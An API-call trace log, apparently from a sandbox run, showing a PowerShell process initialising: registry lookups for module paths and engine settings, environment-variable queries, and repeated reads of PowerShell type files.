	[0561.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.235] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0561.236] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0561.236] CoTaskMemFree (pv=0x291700) 
	[0561.237] CoTaskMemAlloc (cb=0xcc) returned 0x338510
	[0561.237] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x338510, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0561.237] CoTaskMemFree (pv=0x338510) 
	[0561.237] CoTaskMemAlloc (cb=0xf0) returned 0x1b9565b0
	[0561.237] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b9565b0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0561.238] CoTaskMemFree (pv=0x1b9565b0) 
	[0561.238] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7c8 | out: phkResult=0xcd7c8*=0x330) returned 0x0
	[0561.238] RegQueryValueExW (in: hKey=0x330, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd74c, lpData=0x0, lpcbData=0xcd748*=0x0 | out: lpType=0xcd74c*=0x2, lpData=0x0, lpcbData=0xcd748*=0x6c) returned 0x0
	[0561.238] CoTaskMemAlloc (cb=0x70) returned 0x2d0140
	[0561.238] RegQueryValueExW (in: hKey=0x330, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd71c, lpData=0x2d0140, lpcbData=0xcd718*=0x6c | out: lpType=0xcd71c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd718*=0x6c) returned 0x0
	[0561.238] CoTaskMemFree (pv=0x2d0140) 
	[0561.238] CoTaskMemAlloc (cb=0xcc) returned 0x338510
	[0561.238] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x338510, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0561.238] CoTaskMemFree (pv=0x338510) 
	[0561.238] CoTaskMemAlloc (cb=0xcc) returned 0x338510
	[0561.238] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x338510, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0561.239] CoTaskMemFree (pv=0x338510) 
	[0561.242] RegCloseKey (hKey=0x330) returned 0x0
	[0561.242] CoTaskMemAlloc (cb=0xcc) returned 0x338510
	[0561.242] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x338510, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0561.242] CoTaskMemFree (pv=0x338510) 
	[0561.242] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7c8 | out: phkResult=0xcd7c8*=0x330) returned 0x0
	[0561.243] RegQueryValueExW (in: hKey=0x330, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd74c, lpData=0x0, lpcbData=0xcd748*=0x0 | out: lpType=0xcd74c*=0x0, lpData=0x0, lpcbData=0xcd748*=0x0) returned 0x2
	[0561.243] RegCloseKey (hKey=0x330) returned 0x0
	[0561.249] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0561.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.249] CoTaskMemFree (pv=0x291700) 
	[0561.251] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0561.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.251] CoTaskMemFree (pv=0x291700) 
	[0562.744] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0562.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.744] CoTaskMemFree (pv=0x291700) 
	[0562.744] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0562.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.744] CoTaskMemFree (pv=0x291700) 
	[0562.750] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5b8 | out: phkResult=0xcd5b8*=0x330) returned 0x0
	[0562.750] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd5cc, lpData=0x0, lpcbData=0xcd5c8*=0x0 | out: lpType=0xcd5cc*=0x1, lpData=0x0, lpcbData=0xcd5c8*=0x74) returned 0x0
	[0562.751] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd53c, lpData=0x0, lpcbData=0xcd538*=0x0 | out: lpType=0xcd53c*=0x1, lpData=0x0, lpcbData=0xcd538*=0x74) returned 0x0
	[0562.751] CoTaskMemAlloc (cb=0x78) returned 0x2d0140
	[0562.751] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd50c, lpData=0x2d0140, lpcbData=0xcd508*=0x74 | out: lpType=0xcd50c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd508*=0x74) returned 0x0
	[0562.751] CoTaskMemFree (pv=0x2d0140) 
	[0562.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0562.751] SetErrorMode (uMode=0x1) returned 0x1
	[0562.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0562.751] SetErrorMode (uMode=0x1) returned 0x1
	[0562.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0562.752] SetErrorMode (uMode=0x1) returned 0x1
	[0562.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd490 | out: lpFileInformation=0xcd490*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0562.752] SetErrorMode (uMode=0x1) returned 0x1
	[0562.755] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0562.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.755] CoTaskMemFree (pv=0x291700) 
	[0562.761] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0562.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.761] CoTaskMemFree (pv=0x291700) 
	[0562.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0562.767] SetErrorMode (uMode=0x1) returned 0x1
	[0562.767] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0562.768] GetFileType (hFile=0x338) returned 0x1
	[0562.768] SetErrorMode (uMode=0x1) returned 0x1
	[0562.768] GetFileType (hFile=0x338) returned 0x1
	[0562.769] ReadFile (in: hFile=0x338, lpBuffer=0x2fa0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2fa0820*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0562.771] ReadFile (in: hFile=0x338, lpBuffer=0x2fa0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2fa0820*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0562.772] ReadFile (in: hFile=0x338, lpBuffer=0x2fa0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2fa0820*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0562.773] ReadFile (in: hFile=0x338, lpBuffer=0x2fa0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2fa0820*, lpNumberOfBytesRead=0xcd3c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0562.773] ReadFile (in: hFile=0x338, lpBuffer=0x2f9fc7b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2f9fc7b*, lpNumberOfBytesRead=0xcd3c8*=0x0, lpOverlapped=0x0) returned 1
	[0562.773] ReadFile (in: hFile=0x338, lpBuffer=0x2fa0820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2fa0820*, lpNumberOfBytesRead=0xcd3c8*=0x0, lpOverlapped=0x0) returned 1
	[0562.775] CloseHandle (hObject=0x338) returned 1
	[0562.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0562.780] SetErrorMode (uMode=0x1) returned 0x1
	[0562.780] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0562.780] SetErrorMode (uMode=0x1) returned 0x1
	[0564.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.225] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x338) returned 0x0
	[0564.225] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0564.225] CoTaskMemAlloc (cb=0x5a) returned 0x1b963290
	[0564.226] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1b963290, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0564.226] CoTaskMemFree (pv=0x1b963290) 
	[0564.226] RegCloseKey (hKey=0x338) returned 0x0
	[0564.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0565.503] VirtualQuery (in: lpAddress=0xcc110, lpBuffer=0xccfd0, dwLength=0x30 | out: lpBuffer=0xccfd0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0565.513] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0565.513] GetFileType (hFile=0x330) returned 0x1
	[0565.513] SetErrorMode (uMode=0x1) returned 0x1
	[0565.513] GetFileType (hFile=0x330) returned 0x1
	[0565.513] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.514] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.514] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.514] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.515] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.515] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.515] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.515] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.515] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.517] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.517] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.518] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.518] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.519] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.519] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.519] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.520] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.523] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.523] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.528] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.528] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.528] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.529] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.529] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.529] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.530] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.530] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.531] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.531] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.531] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.532] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.532] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0565.532] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.815] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.816] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.816] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.817] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.817] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.817] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
